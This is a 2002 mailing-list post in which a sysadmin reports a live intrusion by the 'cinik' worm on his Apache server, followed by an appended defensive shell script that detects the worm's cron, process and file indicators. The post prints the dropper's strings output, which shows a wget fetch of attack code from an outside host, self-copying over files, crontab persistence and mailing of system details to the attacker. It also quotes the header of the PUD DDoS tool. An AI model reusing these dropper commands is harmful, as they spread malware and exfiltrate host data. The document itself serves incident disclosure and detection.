[ale] Under attack! (html encoding alert)

James P. Kinney III jkinney at localnetsolutions.com
Tue Sep 24 01:26:27 EDT 2002

Sorry for the html, having a bit of a problem right now.

I stumbled across a cracker getting into my box. May have come in through apache, as the username on the installed app is apache. (httpd error log looks like an openssl attack; openssl was NOT upgraded <doh!>)

In ps, I saw:

21236 ?        S     96:33 /tmp/.cinik 63.238.109.140

Which is NOT something of mine. I was investigating a possible intrusion on another machine and did a ping on an IP address that someone had telnetted in from on this client's machine. It was a live address with no DNS records and it suddenly went dark. A few minutes later, I noticed the connection lights on my DSL staying active for much longer than getting email. Saw the above process running on the webserver.

Ran "strings" on the found worm file. Some interesting stuff from that:

/usr/bin/wget http://zamfy.home.ro/0/cinik.c
mv /tmp/cinik.c /tmp/.cinik.c
echo -e 'chmod a+x $i
echo 1 `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
echo '# ale altora'>> /tmp/.cinik.go
echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 2>/dev/null`'>> /tmp/.cinik.go
echo 'do'>> /tmp/.cinik.go
echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go
echo ' chmod a+x $i'>> /tmp/.cinik.go
echo ' echo 2 `/bin/date +%H` \* \* \* $i %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
echo 'done'>> /tmp/.cinik.go
echo ' '>> /tmp/.cinik.go
echo '# directoarele mele'>> /tmp/.cinik.go
echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid $myid`'>> /tmp/.cinik.go
echo ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go
echo ' chmod a+x $i/.cinik'>> /tmp/.cinik.go
echo ' echo 3 `/bin/date +%H` \* \* \* $i/.cinik %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'echo HDD >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'cat /bin/df -h >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'echo IP >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'cat /sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.cinik.go
echo 'myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.cinik.go
echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>> /tmp/.cinik.go
echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go
chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit

This was from running strings on the lastlog in /var/log:

# strings lastlog
171.118.33.65.cfl.rr.com
1-020.adsl.cyberlink.ch

But the real clincher is I caught the bastard in the act and got the source code intact!

From the file /tmp/.cinik.c

/****************************************************************************
 *                                                                          *
 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
 *                         by contem at efnet                                  *
 *                                                                          *
 *         Virtually connects computers via the udp protocol on the         *
 *  specified port.  Uses a newly created peer-to-peer protocol that        *
 *  incorperates uses on unstable or dead computers.  The program is        *
 *  ran with the parameters of another ip on the virtual network.  If       *
 *  running on the first computer, run with the ip 127.0.0.1 or some        *
 *  other type of local address.  Ex:                                       *
 *                                                                          *
 *           Computer A:   ./program 127.0.0.1                              *
 *           Computer B:   ./program Computer_A                             *
 *           Computer C:   ./program Computer_A                             *
 *           Computer D:   ./program Computer_C                             *
 *                                                                          *
 *         Any form of that will work.  The linking process works by        *
 *  giving each computer the list of avaliable computers, then              *
 *  using a technique called broadcast segmentation combined with TCP       *
 *  like functionality to insure that another computer on the network       *
 *  receives the broadcast packet, segments it again and recreates          *
 *  the packet to send to other hosts.  That technique can be used to       *
 *  support over 16 million simutaniously connected computers.              *
 *                                                                          *
 *         Thanks to ensane and st for donating shells and test beds        *
 *  for this program.  And for the admins who removed me because I          *
 *  was testing this program (you know who you are) need to watch           *
 *  their backs.                                                            *
 *                                                                          *
 *         I am not responsible for any harm caused by this program!        *
 *  I made this program to demonstrate peer-to-peer communication and       *
 *  should not be used in real life.  It is an education program that       *
 *  should never even be ran at all, nor used in any way, shape or          *
 *  form.  It is not the authors fault if it was used for any purposes      *
 *  other than educational.                                                 *
 *                                                                          *
 *                                                                          *
 *      A FEW MODIFICATIONS MADE BY CiNIK FOR BETTER HIDING ON THE VICTIM   *
 *                                                                          *
 *                                                                          *
 ****************************************************************************/

So now I'm getting pounded by UDP packets in a DoS from at least 18 IPs.

This is going to the FBI.

-- 
James P. Kinney III   \Changing the mobile computing world/
President and CEO      \          one Linux user         /
Local Net Solutions,LLC \           at a time.          /
770-493-8244             \.___________________________./

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics) <jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7 
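The strings quoted in the message above spell out three things a responder can check for on other hosts, and the following triage helper is an added example that is not part of the original post and not the worm's own code. The dropper's generated script (its Romanian comments read "# ale altora", "others' [files]", and "# directoarele mele", "my directories") overwrites every file with mode exactly 0007 under /usr, /var, /tmp, /home and /mnt with a copy of /tmp/.cinik, puts a copy named .cinik in every directory owned by the worm's uid, and after each copy pipes one line of the form "N HH * * * <path> ... > /dev/null 2>&1" into crontab, which replaces the invoking user's whole crontab with that single entry at minute 1, 2 or 3 of the infection hour. It also writes /tmp/.cinik.status but mails and deletes /tmp/cinik.status (no dot), so the status file is left on disk. The function and variable names below are my own, and the sample crontab and ps text are constructed to mirror the shapes shown in the message; nothing here is taken from a live system.

```shell
#!/bin/sh
# Added triage helper; not part of the original post and not the worm's code.
# It checks a host for the indicators the quoted strings output shows the
# dropper creating.  Assumed names: the cinik_* functions and SAMPLE_* data
# are mine; the sample crontab and ps text are constructed for offline use.

# 1. Cron persistence.  Each "echo N `date +%H` * * * CMD > /dev/null 2>&1 |
#    crontab" in the dropper replaces the invoking user's whole crontab with a
#    single line: minute 1, 2 or 3, the hour of infection, every day.  Read
#    crontab text on stdin, print lines of that shape.
cinik_cron_lines() {
    grep -E '^[123][[:space:]]+([01]?[0-9]|2[0-3])[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+.*>[[:space:]]*/dev/null[[:space:]]+2>&1[[:space:]]*$'
}

# 2. Running peer.  The binary is started as "/tmp/.cinik <peer-ip>".  Read
#    ps output on stdin, print commands named .cinik followed by an IPv4 address.
cinik_proc_lines() {
    grep -E '(^|/)\.cinik[[:space:]]+[0-9]{1,3}(\.[0-9]{1,3}){3}([[:space:]]|$)'
}

# 3. Dropped files.  Arguments are directories to scan.  Prints regular files
#    named .cinik* (.cinik, .cinik.c, .cinik.go, .cinik.status) and files whose
#    mode is exactly 0007, the set selected by the worm's "find ... -perm 7".
#    A file the worm overwrote keeps 0007 unless the worm's user owned it, in
#    which case its "chmod a+x" turned the mode into 0117; both are listed.
cinik_files() {
    find "$@" -type f \( -name '.cinik*' -o -perm 0007 -o -perm 0117 \) 2>/dev/null
}

# ---- constructed sample data and demo wrappers (offline run) ----
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
1 14 * * * /var/tmp/.cinik 63.238.109.140 > /dev/null 2>&1
2 14 * * * /var/www/upload/counter.cgi %1 > /dev/null 2>&1
30 * * * * /usr/sbin/logrotate /etc/logrotate.conf'

SAMPLE_PS='  PID TTY      STAT   TIME COMMAND
  812 ?        S      0:03 /usr/sbin/httpd
21236 ?        S     96:33 /tmp/.cinik 63.238.109.140
21300 ?        S      0:00 /usr/sbin/sendmail -q'

# Number of suspicious cron lines in the sample crontab (2).
cinik_demo_cron_count() {
    printf '%s\n' "$SAMPLE_CRONTAB" | cinik_cron_lines | wc -l | tr -d ' '
}

# Number of .cinik processes in the sample ps output (1).
cinik_demo_proc_count() {
    printf '%s\n' "$SAMPLE_PS" | cinik_proc_lines | wc -l | tr -d ' '
}

# Build a throwaway tree with one dropper, one mode-0007 file and one clean
# file, scan it with cinik_files, and report the number of hits (2).
cinik_demo_file_count() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/tmp" "$d/home/www"
    : > "$d/tmp/.cinik";            chmod 755  "$d/tmp/.cinik"
    : > "$d/home/www/counter.cgi";  chmod 0007 "$d/home/www/counter.cgi"
    : > "$d/home/www/index.html";   chmod 0644 "$d/home/www/index.html"
    n=$(cinik_files "$d" | wc -l | tr -d ' ')
    rm -rf "$d"
    echo "$n"
}
```

On a live host the same functions take real input: "crontab -u apache -l | cinik_cron_lines", "ps axww | cinik_proc_lines", and "cinik_files /usr /var /tmp /home /mnt" (the directory set the worm itself scans). Run them from a known-good copy of the tools, since a dropper that comes with its own source can just as easily be replaced by one that hides from ps, and treat any file the mode check turns up as overwritten, not merely mis-permissioned: the worm copies itself over such files without renaming them, so the path in the crontab entry is the only clue to the original name.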